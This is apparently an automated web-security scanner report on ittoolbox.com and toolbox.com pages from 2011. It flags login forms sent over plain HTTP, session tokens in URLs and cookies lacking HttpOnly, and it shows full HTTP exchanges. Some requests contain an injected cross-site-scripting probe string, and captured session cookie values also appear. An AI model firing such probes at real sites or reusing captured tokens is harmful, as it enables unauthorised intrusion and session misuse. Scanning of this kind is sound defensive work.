HTTP/1.1 200 OK Cache-Control: private Content-Length: 72604 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fxf05445egzyff3bwiyjik3x; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:10 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://networking.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: networking.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 91759 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=5kuwlnb05jml5f45ib34n555; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:14 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://oracle.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: oracle.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78126 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://peoplesoft.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: peoplesoft.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70995 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:21 GMT Connection: close
GET / HTTP/1.1 Host: projectmanagement.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70396 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:22 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://sap.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: sap.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 83566 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:36 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://security.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: security.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81934 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:33 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://siebel.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: siebel.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72499 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:39 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://storage.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: storage.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:41 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://supplychain.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: supplychain.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74807 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://telephony.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: telephony.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62475 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:49 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://unix.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: unix.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80502 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:56 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://visualbasic.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: visualbasic.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 63969 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://webdesign.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: webdesign.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79392 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:55 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://windows.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: windows.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 77587 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Windows Com ...[SNIP]... </div> <form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm"> <div> ...[SNIP]... <div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="<% =btnSignIn.ClientID %>" /></div> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://wireless.ittoolbox.com/Default.aspx
The form contains the following password field:
m$txtSignin_Password
Request
GET / HTTP/1.1 Host: wireless.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 73493 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:00 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ebizq.net/goldclub/login.php
The form contains the following password field:
password
Request
GET /blogs/saasweek/ HTTP/1.1 Host: www.ebizq.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:56:55 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes X-Powered-By: PHP/4.3.2 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56022
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/Feedback.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /Feedback.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 24211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:46 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/PrivacyPolicy.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /PrivacyPolicy.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 35183 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/TermsofUse.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /TermsofUse.aspx HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 46350 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:42 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/about/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /about/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 22640 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:40 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/careers/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /careers/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/contact/
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /contact/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/it/advertising/
The form contains the following password field:
ctl00$ctl00$m$txtSignin_Password
Request
GET /it/advertising/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 26971 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:45 GMT Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.toolbox.com/news/Default.aspx
The form contains the following password field:
ctl00$m$txtSignin_Password
Request
GET /news/ HTTP/1.1 Host: www.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21896 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ugckar45ukzeih55dzbcsf45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:51:43 GMT Connection: close
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /m2/infotechtoolbox/mbox/standard?mboxHost=it.toolbox.com&mboxSession=1296053537181-721966&mboxPage=1296053537181-721966&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&mbox=blogs_cta_start_a_blog&mboxId=0&mboxTime=1296031938515&mboxURL=http%3A%2F%2Fit.toolbox.com%2Fblogs%2Fppmtoday%2Fventure-and-gender-43847%3Fee209'-alert(1)-'185afe72fe1%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F4&mboxVersion=39 HTTP/1.1 Host: infotechtoolbox.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847?ee209'-alert(1)-'185afe72fe1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 177 Date: Wed, 26 Jan 2011 14:51:58 GMT Server: Test & Target
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /white-paper/ HTTP/1.1 Host: hs.maas360.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:55:33 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=6de0a61392ea135c6980b8417bddae51; path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24296
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]...
guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /toolboxdotcom HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:29 GMT Server: hi Status: 200 OK X-Transaction: 1296053789-52552-6574 ETag: "cba3bfc96bf68c050adb0ae164dc8175" Last-Modified: Wed, 26 Jan 2011 14:56:29 GMT X-Runtime: 0.01600 Content-Type: text/html; charset=utf-8 Content-Length: 51936 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053788039947; path=/; expires=Wed, 02-Feb-11 14:56:28 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378903672234; path=/; expires=Fri, 25 Feb 2011 14:56:29 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWY4MmYzNTRlZWE2MzBkYjZlMzAxMGM2YmExZmIzMTAwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbmHTwi0B--5f068f484769ee483f9eaf437005d73e90b46f16; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /toolboxforit HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 26 Jan 2011 14:56:27 GMT Server: hi Status: 200 OK X-Transaction: 1296053787-90115-59528 ETag: "88e9aa64188f9d64f88986da2628b13f" Last-Modified: Wed, 26 Jan 2011 14:56:27 GMT X-Runtime: 0.01067 Content-Type: text/html; charset=utf-8 Content-Length: 45652 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296053787142478; path=/; expires=Wed, 02-Feb-11 14:56:27 GMT; domain=.twitter.com Set-Cookie: guest_id=129605378737979704; path=/; expires=Fri, 25 Feb 2011 14:56:27 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljM2MwNTc3NjdjNTdhMzAyZDA4OTRlY2U5NzliMjM0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI9VrTwi0B--bba18e9789744f8014c5ff57c43fcea71113a57e; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ads/apiresults.js HTTP/1.1 Host: www.indeed.com Proxy-Connection: keep-alive Referer: http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067?28cff'-alert(1)-'27a3eb6d893=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%2fventure-and-gender-43847 HTTP/1.1 Host: cspix.media6degrees.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv1a96l00i0p01050410h; orblb=2lfk1rn012dh10u0100000; rdrlst=20z0s7dpletz4d0000000e0p01050410eo2ylebnns0000000i0p01050410h10flfk1rn000000030p01050310310elfk1rn000000030p010503103mmnlebnns0000000i0p01050410hxo1lebnns0000000i0p01050410hx1blebnns0000000i0p01050410heh5lf17qf0000000a0p01050410a6bylemlne0000000g0p01050410gw3clebnns0000000i0p01050410h7gmlebnns0000000i0p01050410hjv6lebnns0000000i0p01050410hj4ilew2e20000000c0p01050410cxthlebnns0000000i0p01050410hfullf8gij000000060p0105041060c9lfk1rn000000030p010503103jillebnns0000000i0p01050410hfuqlegh2b0000000h0p01050410hb6mlf17qk000000090p010504109mz1lebnns0000000i0p01050410hcajlfk1rn000000030p010503103p7vlebnns0000000i0p01050410h7vglfk1rn000000030p010503103xvslebnns0000000i0p01050410h10rlfjpei000000040p010504104xuklebnns0000000i0p01050410hx1jlebnns0000000i0p01050410hjk7lebnns0000000i0p01050410hcbnlfk1rn000000030p010503103yiplebnns0000000i0p01050410hyh0lebnns0000000i0p01050410hxwflebnns0000000i0p01050410he4vlebnns0000000i0p01050410hjwblfk1rn000000030p010503103xwblebnns0000000i0p01050410h; 